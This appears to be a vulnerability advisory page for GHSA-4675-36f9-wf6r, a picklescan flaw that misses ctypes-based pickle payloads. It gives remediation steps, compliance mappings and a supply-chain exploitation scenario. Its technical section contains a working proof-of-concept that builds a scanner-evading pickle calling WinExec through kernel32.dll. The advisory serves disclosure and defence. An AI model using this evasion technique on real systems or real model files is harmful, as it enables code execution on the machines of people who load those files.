GHSA-4675-36f9-wf6r — HIGH AI Security Vulnerability

Q: Is GHSA-4675-36f9-wf6r actively exploited?

No confirmed active exploitation of GHSA-4675-36f9-wf6r has been reported, but organizations should still patch proactively.

Q: How to fix GHSA-4675-36f9-wf6r?

1. PATCH: Upgrade picklescan to 0.0.33 immediately — this release adds ctypes to the dangerous module blocklist. 2. VERIFY: Audit CI/CD and MLOps pipelines to confirm picklescan version in use; check Dockerfiles, requirements.txt, and pre-commit hooks. 3. INTERIM WORKAROUND: If immediate upgrade is blocked, add an explicit denylist check for 'ctypes' in pre-load validation scripts. 4. ARCHITECTURE: Migrate to safer serialization formats (safetensors, ONNX, TorchScript) for any model served from untrusted sources — pickle should never be used for untrusted model distribution. 5. DETECTION: Search logs and artifact stores for .pkl/.pt/.pth files loaded from external sources in last 90 days; treat any pre-patch external model load as potentially compromised. 6. POLICY: Enforce model provenance — only load models from signed, internal registries or verified publisher accounts.

Q: What systems are affected by GHSA-4675-36f9-wf6r?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, ML model registries, agent frameworks, data science environments.

Q: What is the CVSS score for GHSA-4675-36f9-wf6r?

No CVSS score has been assigned yet.

CISO Take

picklescan is a last-line-of-defense security control for ML model files — this bypass nullifies that control entirely. Any organization using picklescan to gate pickle file loading in MLOps pipelines, model registries, or CI/CD must upgrade to v0.0.33 immediately. Until patched, assume picklescan provides zero protection against ctypes-based payloads and enforce strict allow-listing of model sources.

Risk Assessment

HIGH risk with critical implications specific to AI/ML security posture. picklescan is commonly deployed as a trust gate for loading third-party or community ML models (PyTorch, scikit-learn, etc.). The ctypes bypass is particularly dangerous because: (1) it grants native OS-level code execution, not just Python-level; (2) it can dismantle Python interpreter sandboxes, defeating defense-in-depth; (3) a working PoC is publicly available, lowering attacker barrier significantly. Windows environments are most immediately threatened (WinDLL/WinExec), but the ctypes primitives are cross-platform and Linux/macOS variants are trivially achievable.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
picklescan	pip	< 0.0.33	`0.0.33`
401 3 dependents Pushed 2mo ago 95% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Moderate

Recommended Action

6 steps

PATCH

Upgrade picklescan to 0.0.33 immediately — this release adds ctypes to the dangerous module blocklist.
VERIFY

Audit CI/CD and MLOps pipelines to confirm picklescan version in use; check Dockerfiles, requirements.txt, and pre-commit hooks.
INTERIM WORKAROUND

If immediate upgrade is blocked, add an explicit denylist check for 'ctypes' in pre-load validation scripts.
ARCHITECTURE

Migrate to safer serialization formats (safetensors, ONNX, TorchScript) for any model served from untrusted sources — pickle should never be used for untrusted model distribution.
DETECTION

Search logs and artifact stores for .pkl/.pt/.pth files loaded from external sources in last 90 days; treat any pre-patch external model load as potentially compromised.
POLICY

Enforce model provenance — only load models from signed, internal registries or verified publisher accounts.

Classification

Code Execution Supply Chain Auth Bypass Framework Model AML.T0010.001 - AI Software AML.T0010.003 - Model AML.T0011.000 - Unsafe AI Artifacts AML.T0018.002 - Embed Malware AML.T0097 - Virtualization/Sandbox Evasion AML.T0107 - Exploitation for Defense Evasion

Compliance Impact

This CVE is relevant to:

EU AI Act

Art.15 - Accuracy, robustness and cybersecurity for high-risk AI systems Art.9 - Risk management system

ISO 42001

A.6.2.6 - AI supply chain security A.8.4 - AI system operation and monitoring

NIST AI RMF

GOVERN-6.1 - Policies and procedures are in place for AI supply chain traceability MANAGE-2.2 - Mechanisms to sustain the value of AI system treatments

OWASP LLM Top 10

LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-4675-36f9-wf6r?

picklescan is a last-line-of-defense security control for ML model files — this bypass nullifies that control entirely. Any organization using picklescan to gate pickle file loading in MLOps pipelines, model registries, or CI/CD must upgrade to v0.0.33 immediately. Until patched, assume picklescan provides zero protection against ctypes-based payloads and enforce strict allow-listing of model sources.

Is GHSA-4675-36f9-wf6r actively exploited?

No confirmed active exploitation of GHSA-4675-36f9-wf6r has been reported, but organizations should still patch proactively.

How to fix GHSA-4675-36f9-wf6r?

1. PATCH: Upgrade picklescan to 0.0.33 immediately — this release adds ctypes to the dangerous module blocklist. 2. VERIFY: Audit CI/CD and MLOps pipelines to confirm picklescan version in use; check Dockerfiles, requirements.txt, and pre-commit hooks. 3. INTERIM WORKAROUND: If immediate upgrade is blocked, add an explicit denylist check for 'ctypes' in pre-load validation scripts. 4. ARCHITECTURE: Migrate to safer serialization formats (safetensors, ONNX, TorchScript) for any model served from untrusted sources — pickle should never be used for untrusted model distribution. 5. DETECTION: Search logs and artifact stores for .pkl/.pt/.pth files loaded from external sources in last 90 days; treat any pre-patch external model load as potentially compromised. 6. POLICY: Enforce model provenance — only load models from signed, internal registries or verified publisher accounts.

What systems are affected by GHSA-4675-36f9-wf6r?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, ML model registries, agent frameworks, data science environments.

What is the CVSS score for GHSA-4675-36f9-wf6r?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary Picklescan doesnt flag ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to * Load DLLs * Call C functions directly * Manipulate memory raw pointers. This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue that ctypes being allowed presents is that it can be used down the line to dismantle interpreter based python sandboxes as ctypes allow direct access to raw memory. This is a more severe loophole than normal gadget chains and bypasses as raw memory access can be used for a lot of nefarious purposes down the line if left undetected ### PoC ```python import pickle import ctypes import operator class Kernel32Loader: def __reduce__(self): #we go direct to the kerneeellllllll return (ctypes.WinDLL, ("kernel32.dll",)) class WinExecGetter: def __reduce__(self): return (operator.itemgetter("WinExec"), (Kernel32Loader(),)) class PopCalc: def __reduce__(self): #methodcaller to invoke "__call__" on the function pointer. return ( operator.methodcaller("__call__", b"calc.exe", 1), (WinExecGetter(),) ) try: payload = pickle.dumps(PopCalc()) with open("calc_exploit.pkl", "wb") as f: f.write(payload) print("Generated 'calc_exploit.pkl'") except Exception as e: print(f"Generation failed: {e}") ``` This will create a pickle file which is not detected by the latest version of picklescan as malicious ```python import pickle print("Loading bypass.pkl...") pickle.load(open("calc_exploit.pkl", "rb")) ``` <img width="1333" height="677" alt="image" src="https://github.com/user-attachments/assets/f5b066f3-116a-4377-a538-f293f3a6c176" />

Exploitation Scenario

An adversary targeting an MLOps team publishes a malicious PyTorch model to a public repository (e.g., Hugging Face, GitHub). The model performs as advertised for its stated task but embeds a ctypes payload in its __reduce__ method. The victim organization's CI pipeline pulls the model, runs picklescan (< 0.0.33) — scan returns clean. The model is promoted to staging. Upon first load by a training or inference worker, pickle deserialization triggers the ctypes payload, loading kernel32.dll (Windows) or libc (Linux) and executing arbitrary OS commands under the service account's privileges — achieving persistent RCE in the MLOps environment without triggering any pickle-layer detection.